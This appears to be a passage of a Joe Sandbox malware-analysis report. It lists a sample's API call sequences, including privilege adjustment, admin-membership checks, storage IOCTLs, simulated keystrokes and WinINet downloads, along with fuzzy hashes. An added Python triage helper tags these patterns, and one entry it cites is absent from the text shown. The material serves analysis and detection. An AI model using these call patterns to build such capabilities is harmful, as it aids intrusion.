                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: DialogNtdllProc_$LongWindow
                                    • String ID:
                                    • API String ID: 1155049231-0
                                    • Opcode ID: 6fc43915a0923b1b971d19ee4db9f463f6e899665b3380a4cf133b1c731fb4a4
                                    • Instruction ID: e79064a8ba08fd9ebcb1ce06a4e6acec7845dae998bd88c81944e9aa10e05318
                                    • Opcode Fuzzy Hash: 6fc43915a0923b1b971d19ee4db9f463f6e899665b3380a4cf133b1c731fb4a4
                                    • Instruction Fuzzy Hash: ECA1687411C105BADF2CAF2A5CC8EBF29ACEB57750B15412DF402D65B1DBA9EC01D272
                                    APIs
                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,001843BF,00000000), ref: 00184FA6
                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00184FD2
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Internet$AvailableDataFileQueryRead
                                    • String ID:
                                    • API String ID: 599397726-0
                                    • Opcode ID: d9a400cae7201cb85d143fc18ae7d7330edbed5376d7be5bd620927eb44a5742
                                    • Instruction ID: 58c1e32d9a1b4190564ecf70a9cd30b44f28723d8f6055fcef5be18c6016c32f
                                    • Opcode Fuzzy Hash: d9a400cae7201cb85d143fc18ae7d7330edbed5376d7be5bd620927eb44a5742
                                    • Instruction Fuzzy Hash: DB41F27150460ABFEB20EE94DC85EBFB7ADEB40358F10006EF605A6180EB719F419BA0
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 0017E20D
                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0017E267
                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0017E2B4
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ErrorMode$DiskFreeSpace
                                    • String ID:
                                    • API String ID: 1682464887-0
                                    • Opcode ID: 90a4b70972637236e9bc8e5bf871f879ddbbd9da5e750d993bae504cf16f5307
                                    • Instruction ID: 3617c63a82b084c20d5a8ba0d71a85d544ac2439faaab62cd408f6266a9e00cb
                                    • Opcode Fuzzy Hash: 90a4b70972637236e9bc8e5bf871f879ddbbd9da5e750d993bae504cf16f5307
                                    • Instruction Fuzzy Hash: F6213A75A00218EFCB04EFA5D885AADFBF8FF59314F0484A9E909AB252DB319945CB50
                                    APIs
                                      • Part of subcall function 0014F4EA: std::exception::exception.LIBCMT ref: 0014F51E
                                      • Part of subcall function 0014F4EA: __CxxThrowException@8.LIBCMT ref: 0014F533
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0016B180
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0016B1AD
                                    • GetLastError.KERNEL32 ref: 0016B1BA
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                    • String ID:
                                    • API String ID: 1922334811-0
                                    • Opcode ID: fbf3f3b5536e27c690a43081ed661308d54f554c24987683f45b9d9e5901df7f
                                    • Instruction ID: c1170e319b5db9b400b2ad71514428db6e057bbfa46095fbc1fe92b747982fb2
                                    • Opcode Fuzzy Hash: fbf3f3b5536e27c690a43081ed661308d54f554c24987683f45b9d9e5901df7f
                                    • Instruction Fuzzy Hash: 0E119DB1408205AFE718AF64ECC5D2BB7B8EB44310B20852EE45697250EB70EC818A60
                                    APIs
                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00176623
                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00176664
                                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0017666F
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CloseControlCreateDeviceFileHandle
                                    • String ID:
                                    • API String ID: 33631002-0
                                    • Opcode ID: 1442298f0317b7c422d3fee54cb0496e0bf72f96fdc2bc347471a05613508c36
                                    • Instruction ID: 3ad88b84f426f6bff4c0bf42ce93aec554b7bc67088e9282b574077e48556f49
                                    • Opcode Fuzzy Hash: 1442298f0317b7c422d3fee54cb0496e0bf72f96fdc2bc347471a05613508c36
                                    • Instruction Fuzzy Hash: A01152B1E01228BFDB148F95DC44BAE7BFCEB45710F108152F904E6290D7B05A018BA1
                                    APIs
                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00177223
                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0017723A
                                    • FreeSid.ADVAPI32(?), ref: 0017724A
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                    • String ID:
                                    • API String ID: 3429775523-0
                                    • Opcode ID: ba754581f1400d4af02e79cefb700a5535004a72a72b92dcd3940c9a88ea2e2b
                                    • Instruction ID: 081fd29c55892aaa2f57ba0ff6dd16c1b82f6db865bb824007c232b71af45e7b
                                    • Opcode Fuzzy Hash: ba754581f1400d4af02e79cefb700a5535004a72a72b92dcd3940c9a88ea2e2b
                                    • Instruction Fuzzy Hash: 0BF01D76A04209BFDF04DFE4DD89AEEBBB8EF08201F104569B602E2591E3709A448B10
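The entries above list raw API sequences without saying what each pattern means. What follows is an added example, not Joe Sandbox output and not code from the analysed sample: a small Python triage helper that parses the report's own "APIs" line format and tags each function entry by its call pattern. Its constructed input is copied from five entries in this listing (the FindFirstFileW loop at 0017EB8A, the WinINet read loop at 00184FA6, the AdjustTokenPrivileges call at 0016B180, the DeviceIoControl call at 00176623 and the CheckTokenMembership call at 00177223). Two facts it relies on are Windows SDK values rather than statements of the report: 0x002D1400 is IOCTL_STORAGE_QUERY_PROPERTY (device type 0x2D, function 0x500, METHOD_BUFFERED), and AllocateAndInitializeSid with two sub-authorities 0x20 and 0x220 builds S-1-5-32-544, BUILTIN\Administrators, which makes that sequence the canonical "is the caller an admin" test. The tag names and rules are this example's own.

```python
"""Tag the "APIs" lists of the function entries above by call pattern.
Added example (not Joe Sandbox code); sample entries are copied from this
report section, the tag names and rules are this example's own."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed input: one "APIs" list per function entry, keyed by its first ref.
SAMPLE_ENTRIES = {
    "0017EB8A": """• FindFirstFileW.KERNEL32(?,?), ref: 0017EB8A
• _wcscmp.LIBCMT ref: 0017EBBA
• FindNextFileW.KERNEL32(00000000,?), ref: 0017EBE0
• FindClose.KERNEL32(00000000,00000001,00000000), ref: 0017EC0E""",
    "00184FA6": """• InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,001843BF,00000000), ref: 00184FA6
• InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00184FD2""",
    "0016B180": """• Part of subcall function 0014F4EA: std::exception::exception.LIBCMT ref: 0014F51E
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0016B180
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0016B1AD
• GetLastError.KERNEL32 ref: 0016B1BA""",
    "00176623": """• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00176623
• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00176664
• CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0017666F""",
    "00177223": """• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00177223
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0017723A
• FreeSid.ADVAPI32(?), ref: 0017724A""",
}

# Report line shape: "• Api.MODULE(args), ref: addr"; the argument list and the
# "Part of subcall function X:" prefix are both optional.
API_LINE = re.compile(
    r"^\s*•?\s*(?P<sub>Part of subcall function\s+[0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[\w:@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Windows SDK value (an assumption of this example, not something the report states).
KNOWN_IOCTLS = {0x002D1400: "IOCTL_STORAGE_QUERY_PROPERTY"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]  # None where the report printed "?" (value not recovered)
    ref: str
    from_subcall: bool


def parse_entry(text: str) -> List[ApiCall]:
    """Turn one entry's "APIs" lines into ApiCall records; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [] if not raw else [None if a.strip() == "?" else int(a, 16) for a in raw.split(",")]
        calls.append(ApiCall(m.group("api"), m.group("module"), args, m.group("ref"),
                             m.group("sub") is not None))
    return calls


def decode_ioctl(code: int) -> Dict[str, object]:
    """Split a CTL_CODE value into its DeviceType, Access, Function and Method fields."""
    return {
        "device_type": code >> 16,        # 0x2D = FILE_DEVICE_MASS_STORAGE
        "access": (code >> 14) & 0x3,     # 0 = FILE_ANY_ACCESS
        "function": (code >> 2) & 0xFFF,  # 0x500 for STORAGE_QUERY_PROPERTY
        "method": code & 0x3,             # 0 = METHOD_BUFFERED
        "name": KNOWN_IOCTLS.get(code, "unknown"),
    }


def tag_entry(calls: List[ApiCall]) -> List[str]:
    """Map an entry's own calls (subcall lines excluded) to coarse triage tags."""
    by_name = {c.api: c for c in calls if not c.from_subcall}
    tags: List[str] = []
    if "AllocateAndInitializeSid" in by_name and "CheckTokenMembership" in by_name:
        a = by_name["AllocateAndInitializeSid"].args
        # two sub-authorities 0x20/0x220 build S-1-5-32-544 (BUILTIN\Administrators)
        tags.append("admin-membership-check" if a[1:4] == [2, 0x20, 0x220] else "token-membership-check")
    if "LookupPrivilegeValueW" in by_name and "AdjustTokenPrivileges" in by_name:
        tags.append("privilege-adjustment")
    if "DeviceIoControl" in by_name:
        a = by_name["DeviceIoControl"].args
        code = a[1] if len(a) > 1 else None  # dwIoControlCode is the second argument
        tags.append("ioctl:" + (str(decode_ioctl(code)["name"]) if code is not None else "unknown"))
    if "InternetQueryDataAvailable" in by_name or "InternetReadFile" in by_name:
        tags.append("wininet-download")
    if "FindFirstFileW" in by_name and "FindNextFileW" in by_name:
        tags.append("directory-enumeration")
    elif "FindFirstFileW" in by_name:
        tags.append("file-existence-probe")
    return tags


def analyze(entries: Dict[str, str]) -> Dict[str, List[str]]:
    return {ref: tag_entry(parse_entry(text)) for ref, text in entries.items()}


if __name__ == "__main__":
    for ref, tags in analyze(SAMPLE_ENTRIES).items():
        print(ref, ", ".join(tags) or "(no tag)")
```

The tags are triage hints, not verdicts: a privilege adjustment, an admin-membership test or a storage property query is equally at home in a benign runtime library, so they are only useful read together with the report's behavioural signatures. Lines marked "Part of subcall function" are parsed but not tagged, since the called function has its own entry and would otherwise be counted twice.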
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                      • Part of subcall function 0014B526: GetWindowLongW.USER32(?,000000EB), ref: 0014B537
                                    • GetParent.USER32(?), ref: 001AE5B2
                                    • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,0014B1E8,?,?,?,00000006,?), ref: 001AE62C
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: LongWindow$DialogNtdllParentProc_
                                    • String ID:
                                    • API String ID: 314495775-0
                                    • Opcode ID: 16128099aa6c480b779d06db5b68e71a2f5521f6c577060cc7641e97895952fc
                                    • Instruction ID: 2cf85a0f557da47a3daad13413f1632b1b4ad96e8e63e7b8f36425c49cbfcf51
                                    • Opcode Fuzzy Hash: 16128099aa6c480b779d06db5b68e71a2f5521f6c577060cc7641e97895952fc
                                    • Instruction Fuzzy Hash: A4218238605104AFCB288F2DD9C59B93BA6BB4A334F184252F6195B2F2D770DD51DB10
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 0017F599
                                    • FindClose.KERNEL32(00000000), ref: 0017F5C9
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: dcb83755e328d87d7d59ddea08e0ba71d5f81c40b02f68dbd78dae7c75a9fa92
                                    • Instruction ID: c10a431d3d57e2b12ba929fb56a14ea68a12927e4f13a590ccc58f1bf9de5c15
                                    • Opcode Fuzzy Hash: dcb83755e328d87d7d59ddea08e0ba71d5f81c40b02f68dbd78dae7c75a9fa92
                                    • Instruction Fuzzy Hash: 1F1184716006019FD714EF28D885A2EF7E9FF95324F00CA5EF8A9D7291DB70AD018B91
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                    • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,001AE44F,?,?,?), ref: 0019F344
                                      • Part of subcall function 0014B526: GetWindowLongW.USER32(?,000000EB), ref: 0014B537
                                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0019F32A
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: LongWindow$DialogMessageNtdllProc_Send
                                    • String ID:
                                    • API String ID: 1273190321-0
                                    • Opcode ID: d788c2a062f0ff47de6bce5af75eeca50adb2e1b7ac701977d76deaaa66af60c
                                    • Instruction ID: 162acca3738719d1dc2918083922d7348c2c399feca218c51679a92d4cdc0c11
                                    • Opcode Fuzzy Hash: d788c2a062f0ff47de6bce5af75eeca50adb2e1b7ac701977d76deaaa66af60c
                                    • Instruction Fuzzy Hash: C4019A35204204BBCF259F15EC84EAA7B76FB95734F184528F9069B2A0C7B5A842DB50
                                    APIs
                                    • ClientToScreen.USER32(?,?), ref: 0019F6AC
                                    • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,001AE52B,?,?,?,?,?), ref: 0019F6D5
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ClientDialogNtdllProc_Screen
                                    • String ID:
                                    • API String ID: 3420055661-0
                                    • Opcode ID: 4d7c6954b29507922ec009ca676ff1971dc4065b16afe0aa7ea5585cf9c2c870
                                    • Instruction ID: 6107dedbd40e974fab78caa5199f4cb16a8d25f75841e6eeabf0cf51a298152d
                                    • Opcode Fuzzy Hash: 4d7c6954b29507922ec009ca676ff1971dc4065b16afe0aa7ea5585cf9c2c870
                                    • Instruction Fuzzy Hash: BCF0FE72410218FFEF099F95EC099BE7FB9FF44311F14415AF901A2560D7B1AA91EB60
                                    APIs
                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0018BE6A,?,?,00000000,?), ref: 0017CEA7
                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0018BE6A,?,?,00000000,?), ref: 0017CEB9
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ErrorFormatLastMessage
                                    • String ID:
                                    • API String ID: 3479602957-0
                                    • Opcode ID: 3002dcd139b29ad2954a26da0dc8f789a1bfca8181e26869602ba17ac3e9b822
                                    • Instruction ID: b8458d206a78257b277233d9e765b768b45a534bede969501091533c667b2186
                                    • Opcode Fuzzy Hash: 3002dcd139b29ad2954a26da0dc8f789a1bfca8181e26869602ba17ac3e9b822
                                    • Instruction Fuzzy Hash: B0F08271100229EBDB109FA4DC49FEA777DBF08361F008169F919D6191D7709A44CBA0
                                    APIs
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00174153
                                    • keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 00174166
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: InputSendkeybd_event
                                    • String ID:
                                    • API String ID: 3536248340-0
                                    • Opcode ID: bf46206d167530439e1373830f739ea93263daba0974dc37f4ceb22c61684c1c
                                    • Instruction ID: 5654c84b924a694dc5e0a94cdce8afccb39925f2cb16e7cfe9cf33793ed14790
                                    • Opcode Fuzzy Hash: bf46206d167530439e1373830f739ea93263daba0974dc37f4ceb22c61684c1c
                                    • Instruction Fuzzy Hash: 9AF0907080034DAFDB059FA0C805BBE7FB0EF00305F048009F96596191D779D652DFA0
                                    APIs
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0016ACC0), ref: 0016AB99
                                    • CloseHandle.KERNEL32(?,?,0016ACC0), ref: 0016ABAB
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AdjustCloseHandlePrivilegesToken
                                    • String ID:
                                    • API String ID: 81990902-0
                                    • Opcode ID: 404950123514254210386b0291d1da8dcb3389ea89ae40c2e4a8deb6b1cf4994
                                    • Instruction ID: 83d9942dafb3042943dfa32774655165998b599d94b69a629be2c4d9c8727fb4
                                    • Opcode Fuzzy Hash: 404950123514254210386b0291d1da8dcb3389ea89ae40c2e4a8deb6b1cf4994
                                    • Instruction Fuzzy Hash: CDE0EC76004610AFE7292F64FC09D77BBE9EF04321B20892DF99AC5875DB62ACD1DB50
                                    APIs
                                    • GetWindowLongW.USER32(?,000000EC), ref: 0019F7CB
                                    • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,001AE4AA,?,?,?,?), ref: 0019F7F5
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
